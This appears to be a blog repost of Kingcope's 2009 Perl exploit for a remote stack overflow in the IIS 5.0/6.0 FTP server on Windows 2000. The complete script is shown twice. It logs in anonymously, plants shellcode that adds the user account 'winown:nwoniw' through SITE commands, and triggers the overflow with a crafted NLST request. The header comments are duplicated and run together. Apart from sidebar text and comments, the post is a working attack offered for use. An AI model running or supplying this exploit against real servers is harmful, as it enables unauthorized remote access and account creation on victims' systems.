Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

Click Here download PDF

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8 # IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8

# IIS 5.0 FTPd / Remote r00t exploit

002.# Win2k SP4 targets

003.# bug found & exploited by Kingcope, kcope2<at>googlemail.com

004.# Affects IIS6 with stack cookie protection

005.# August 2009 - KEEP THIS 0DAY PRIV8

006.use IO::Socket;

007.$|=1;

008.#metasploit shellcode, adduser "winown:nwoniw"

009.$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .

010."\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .

011."\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .

012."\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .

013."\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .

014."\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .

015."\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .

016."\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .

017."\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .

018."\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .

019."\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .

020."\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .

021."\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .

022."\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .

023."\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .

024."\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .

025."\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .

026."\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .

027."\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .

028."\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .

029."\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .

030."\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .

031."\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .

032."\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .

033."\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .

034."\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .

035."\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .

036."\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .

037."\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .

038."\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .

039."\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .

040."\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .

041."\x51\x54\x43\x30\x41\x41";

042.#1ca

043.print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";

044.if ($#ARGV ne 1) {

045.print "usage: iiz5.pl <target> <your local ip>\n";

046.exit(0);

047.}

048.srand(time());

049.$port = int(rand(31337-1022)) + 1025;

050.$locip = $ARGV[1];

051.$locip =~ s/\./,/gi;

052.if (fork()) {

053.$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

054.PeerPort => '21',

055.Proto    => 'tcp');

056.$patch = "\x7E\xF1\xFA\x7F";

057.#$retaddr = "ZZZZ";

058.$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

059.$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);

060.# top address of stack frame where shellcode resides, is hardcoded inside this block

061.$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"

062.."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

063.# attack buffer

064.$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.

065.($patch x (52/4)) .$patch."EEEE$retaddr".$patch.

066."HHHHIIII".

067.$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";

068.$x = <$sock>;

069.print $x; 

070.print $sock "USER anonymous\r\n";

071.$x = <$sock>;

072.print $x;

073.print $sock "PASS anonymous\r\n";

074.$x = <$sock>;

075.print $x;

076.print $sock "MKD w00t$port\r\n";

077.$x = <$sock>;

078.print $x;

079.print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)

080.$x = <$sock>;

081.print $x;

082.print $sock "SITE $v\r\n";

083.$x = <$sock>;

084.print $x;

085.print $sock "SITE $v\r\n";

086.$x = <$sock>;

087.print $x;

088.print $sock "SITE $v\r\n";

089.$x = <$sock>;

090.print $x;

091.print $sock "SITE $v\r\n";

092.$x = <$sock>;

093.print $x;

094.print $sock "CWD w00t$port\r\n";

095.$x = <$sock>;

096.print $x;

097.print $sock "MKD CCC". "$c\r\n";

098.$x = <$sock>;

099.print $x;

100.print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";

101.$x = <$sock>;

102.print $x;

103.# TRIGGER

104.print $sock "NLST $c*/../C*/\r\n";

105.$x = <$sock>;

106.print $x;

107.while (1) {}

108.} else {

109.my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);

110.die "Could not create socket: $!\n" unless $servsock;

111.my $new_sock = $servsock->accept();

112.while(<$new_sock>) {

113.print $_;

114.}

115.close($servsock);

116.}

117.#Cheerio,

118.#

119.

#Kingcope

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

标签: exploit, IIS

没有评论

分类
赞助商链接
最新日志
武汉爱情往事

于我而言，武汉是个永远也到不了性高潮的女人，尽管丰乳肥臀，但所有的娇喘和呻吟都是如此做作，让人欲罢不能，却又索然无趣。我就在这座缺乏荷尔蒙激素的城市里挥霍时光。
最新评论
- 假装纯情发表于雪夜枕边读禁书 —— 冯唐
  你太执着了～～～ »
- 俗人老六发表于雪夜枕边读禁书 —— 冯唐
  除了金瓶梅还真不知道有这么多书，长见识了。 »
- 假装纯情发表于网上看到一句话
  呵呵 »
- Gary 发表于网上看到一句话
  感觉也是、、 »
- xxzj990 发表于每周一推 2010-07-25
  .....就是，偶也感觉原来的好些。。。。 »
- 匿名发表于每周一推 2010-07-25
  就是，偶也感觉原来的好些。。。。 »
- 假装纯情发表于每周一推 2010-07-25
  看来大家都这么觉得，呃，我的审美确实有问题～～～还是换回来了 »
- 下一页 »
follow5
链接表
功能